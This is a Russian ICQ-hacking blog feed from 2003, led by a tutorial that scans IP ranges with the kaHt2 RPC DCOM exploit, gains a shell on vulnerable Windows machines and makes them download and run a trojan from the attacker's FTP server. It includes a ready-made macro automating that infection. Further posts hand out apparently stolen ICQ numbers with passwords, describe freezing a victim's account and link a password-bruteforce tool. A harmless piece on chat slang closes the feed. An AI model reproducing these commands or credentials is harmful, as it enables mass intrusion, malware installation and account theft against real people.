
В последнее время я стал наблюдать исчерпание способов угнать UIN. Все сводится к тому, чтобы зарегистрировать не существующий (а ранее существовавший) e-mail и выслать на него пароль.
Я решил немного исправить положение и написать эту статью.
Речь пойдет о нашумевшей дыре в протоколе RPC Dcom на Windows системах. Информация о дыре была опубликована 16 Июля, 2003 года командой "Last Stage of Delirium". Уязвимость существует во всех стандартных инсталляциях Windows NT 4.0, Windows 2000, Windows XP, а также в так широко разрекламированном Windows 2003.
Был выпущен многопоточный, многоцелевой эксплоит, эксплуатирующий уязвимость в RPC Dcom. Эксплоит работает против большинства версий Microsoft Windows 2000/XP систем. Поддерживает различные макросы. Этот эксплоит мы и будем использовать для наших корыстных целей.
Скачиваем kaHt2, разархивируем архив в корень диска "С:\", после чего открываем "Srart -> Run" и вбиваем следующею команду "C\:kaHt2.exe 195.96.185.1 195.96.185.255 300 " и жмем "Ok". "195.96.185.1 195.96.185.255" это диапазон IP, которые будут сканироваться. "300" это количество потоков сканирования.
В случаи нахождения уязвимой машины, вы увидите примерно эту строчку "C:\WINDOWS\system32>".
Дальше нам надо закачать троян и с помощью него скачать .dat файл или любую вас интересующую информацию.
Качаем RPC Exploit GUI v2, разархивируем и запускаем "RPC GUI v2 - r3L4x.exe", после чего идем в раздел "FTP Server" и запускаем свой FTP сервер нажатием на кнопку "Start".
Выбор трояна для использования оставляю на ваш выбор, этого добра в инете полным полно.
Допустим что вы выбрали троян и создали сервер для закачки, назвав его trojan_server.exe. Далее кладем trojan_server.exe в корень диска "C:\".
Возвращаемся к нашему эксплоиту и выполняем следующие команды:
1) Пишем "ftp", если все правильно, то вас перекинет на следующую строчку.
2) Пишем "open xxx.xx.xxx.xxx" вместо крестов - ваш IP.
3) Если предыдущий пункт выполнен правильно, вас спросят имя пользователя, тут пишем "asdf".
4) Пишем "get /trojan_server.exe" чтобы атакуемый компьютер скачал ваш троян.
5) Пишем "!trojan_server.exe" чтобы атакуемый компьютер запустил ваш троян .
6) Пишем "exit" чтобы выйти с шела уязвимой машины и начать поиски следующей жертвы.
Я упростил эти действия, написав маленький макрос. Макрос должен лежать в одной директории с kaHt2.exe и называться macros.txt. Открываете macros.txt, стираете все содержимое файла и вбиваете следующий текст:
"[Macro]
name=upload_trojan
key=!1
delay=900
cmd=ftp
cmd=open xxx.xx.xxx.xxx
cmd=asdf
cmd=get \trojan_server.exe
cmd=!trojan_server.exe>>a
cmd=bye"
После чего вам остается лишь набрать "!1" в шеле и все эти команды будут выполнены автоматом, ну а дальше пишите "exit" чтобы выйти с шела и начать искать нового "друга" .
Вроде бы все разложил по полочкам, так что вопросов, думаю, появится не должно.
Убедительная просьба если будете где выкладывать эту статью, ставить копирайт на автора (ven000m) и на этот сайт (Asechka.ru).
Всем спасибо, все свободны.
Обсуждение в форуме.
Использованные файлы:
kaHt2 – скачать.
RPC Exploit GUI v2 – скачать.
Использованный материал:
VOID.RU
securitylab.ru
Статья написано только для ознакомления. Автор не несет не какой ответственности за действия описанные в этой статье.
Задача для особо одаренных! Нужно всего заменить "xx" на одинаковые символы...
~~~~~~~~~~~
uin: 296xx5
password: [nin]
~~~~~~~~~~~
uin: 4x1x03
password: [nin]
~~~~~~~~~~~
uin: 648159
password: [xix] )
~~~~~~~~~~~
Микрософт использует Линух?
Суббота, 16 августа 2003 г.Просмотров: 613
Подписаться на комментарии по RSS
Довольно интересные результаты выдает фингерпринт оси windowsupdate.microsoft.com с помощью nmap'a.
Device type: general purpose
Running: Linux 2.1.X|2.2.X
OS details: Linux 2.1.19 - 2.2.20
Uptime 17.601 days (since Wed Jul 30 01:20:10 2003)
Интересно это фэйк или микрософт поняла прелесть открытого софта? =))))))
Этот и другой фингерпринт оси можно узнать на канале #icqhackers с помощью команды !os <ip>
К нам можно попасть
1) Через веб
2) Через асю, послав $start на уин 10399
3) Скачав скрипт монстра
4) Через ваш ирк клиент, сервер irc.icqinfo.ru канал #icqhackers
Убедительная просьба. Если у вас уже есть шестизнак, не берите! Ну... в крайнем случае, возьмите, чтобы подарить (но ни в коем случае не продать!). Если увижу, что эти номера продаются, берегитесь =)
3517x0
374y57
65z741
9a2641
на всех номерах пароль: 1os7s0u1
халява от s0u1 s33k3r, так что лично я никакой ответственности за нее не несу.
Новый способ заморозки уинов.
Среда, 13 августа 2003 г.Просмотров: 500
Подписаться на комментарии по RSS
Пердыстория: прошла информация, что человек с уина 209000000 кидает добропорядочных продавцов ась (тафтология неможно, но ничего). Мимо меня этот кидала тоже не прошел. Решил обменять два моих xyzxyz на 100903. Ну я предупрежденный и наглый взял и кинул его на 100903 .
Самое оно: после нехитрых комбинаций номер перестал логиниться, а если ввести неправильный пароль, то выдаст Wrong pass. Номер заморожен. Разморозкой служит icq password reset, но примак у него есть, но как я понял от 2001 года, а я выслал пароль на мыло из базы 99го, значит он отдыхает. Как только до конца разберусь в обнаруженном баге, выложу полное описание.
Bonus pack:
icq: 100903
pass: 243 10 21 18 13 166 243 13
Дерзайте!
RusIcq.net owned, или давайте жить по-честному.
Среда, 13 августа 2003 г.Просмотров: 492
Подписаться на комментарии по RSS
Многоуважаемые продавцы уинов, имеющие свои сайты! Уважайте человеческий труд! Перестаньте покупать домены по ворованным кредитным картам, ведь платить честным образом $30 в год не так уж и проблематично!
RusIcq.net, например, больше никогда не будет продавать номера Подробности на главной странице, всем читать. Обсуждения на форуме. http://www.asechka.ru/forum/showthread.php?s=&threadid=3809
На нашем любимом =) канале реализован гейт ICQ <=> IRC. Теперь можно учавствовать в беседах канала даже не имея ИРК клиента.
Для того, чтобы воспользоваться гейтом пошлите на уин 10399 команду: $start
После этого вы будете получать все что пишется на канале, а ваши сообщения будут проговариваться ботом.
Чтобы выйти, пошлите $stop.
На нашем канале есть проверка уинов на инвизибл, выдача операционной системы сайта, переводчик, погода, проверка имэйл уинов по базе 99 года, розыгрыш пятизначек, ежедневная раздача шести и семизначек и много много другого =)
Также на канал можно зайти более традиционным образом:
1) Через веб-гейт: здесь
2) Скачав скрипт монстра: здесь
3) Через ваш ИРК клиент: сервер - irc.icqinfo.ru, канал - #icqhackers
Бесплатные UIN's от сайта NSD.ru
Воскресенье, 10 августа 2003 г.Просмотров: 667
Подписаться на комментарии по RSS
Uin's пердоставлены сайтом NSD.ru - "НеСанкционированный Доступ".
Семь (7) Семизначек (7) с Семизначными (7) паролями =)
Хватайте быстрей, пока за Вас ето не сделал кто-нибудь еще!
4155689;nsd.ru#1
4229925;nsd.ru#2
4232055;nsd.ru#3
4233327;nsd.ru#4
4233905;nsd.ru#5
4246872;nsd.ru#6
4252075;nsd.ru#7
http://www.ifud.ru/ipd/IPDbrute2udc2Pro.rar
Жутко кривая, совершенно нерабочая, один сплошной глюк/баг.
Просьба юзать с большой осторожностью, т.к. может проглотить некоторые уины, не выплюнув их, может сменить пасс и забыть его, никуда не записав, может просто упасть и так далее.
Судя по всему, в details.xml можно в тех полях, где предполагается стринг, а не численное значение, использовать макросы типа %RAND_NUM_1%, %RAND_NUM_2%, %RAND_GUID%, %RAND_TEXT1%, %RAND_TEXT2%, %RAND_TEXT3%, %RAND_TEXT4%...
например:
<main>
<nick>%RAND_NUM_1%</nick>
<first_name>%RAND_TEXT2%</first_name>
<last_name>%RAND_TEXT1%</last_name>
<pri_email>%RAND_TEXT3%@mail.com</pri_email>
если это работает, то по идее и еще более крутые макросы тоже работают =) но об них позже.
короче никаких притензий. если чё-то не так работает - пишите, исправлю может =)
(с) 2003 МЛУ\ша
Скажите «Прощай!» слову «Здравствуй!»
Пятница, 8 августа 2003 г.Просмотров: 360
Подписаться на комментарии по RSS
А виной всему современные технологии, бешеный ритм общения, чаты, ICQ и SMS-сообщения.
Новые правила общения, возникшие благодаря электронной почте и системам мгновенного обмена сообщениями, вскоре сделают слова "здравствуй" и "до свидания" ископаемой редкостью. Для следующего поколения они будут такими же анахронизмами как слова «камзол» или «папильотки». «Привет», «эй» и «пока» – вот какие слова придут им на замену, сообщает Ananova.
И вообще, весь мир будет стремиться переходить на английские “yo”, “hey”, “buy” и "laters". Этому в значительной степени способствуют процессы активного интернационального общения, ставшие возможными благодаря распространению Интернета по планете.
Джонатан Грин, филолог и автор словаря современного сленга, исследовавший эту тему, говорит, что сегодня мы сталкиваемся с ситуацией, когда люди чаще пользуются электронной почтой, чем отживающими свое письмами в бумажных конвертах, а новые технологии вынуждают нас говорить быстрее и автоматически поощряют использование сленга.
"Я не удивлюсь, если в течение ближайших 50 лет слова «здравствуйте» и «до свидания» вообще выйдут из употребления в электронной переписке", - говорит Грин.
Исследование, в котором приняли участие более 2000 добровольцев, проводилось на базе программы обмена короткими сообщениями MSN messager с целью выявления закономерностей новояза. Оказалось, что главная альтернатива приветствию “hello” сегодня "hey", cразу за этим словом по частоте использования идут словечки "g'day", "hola", "howdy" и "yo". Наиболее используемые альтернативы слову “goodbuy” - "laters", "ciao", "au revoir", "hasta la vista" и "in a while".
В процессе исследования выяснилось, что люди сегодня обращаются друг к другу при помощи следующих слов (по нисходящей): "mate", "love", "sweetheart", "buddy" и "pal".
Разумеется, Россия и в этом вопросе идет своим путем, но и у нас редко можно увидеть в аське приветствие типа «Добрый день!», а вместо него даже незнакомому человеку все чаще говорят «привет», «hi», «эй» или «здорово».
Пользуясь случаем автор этой заметки хочет поделиться с читателем мужского пола собственным наблюдением. Если вы хотите «закадрить» девушку по ICQ или электронной почте, попробуйте пересилить себя и писать ей “по-старинке”. Не стесняйтесь использовать развернутые предложения, цитаты и лирические отступления. Используйте все, чему вас учили на уроках языка и литературы (если вы туда ходили). И, если девушка не полная ПТУ-шнца, то если не успех, то, как минимум, заинтересованность вашей персоной возникнет почти наверняка.
Вот и все. Сiao!
Автор: Алексей Ковалев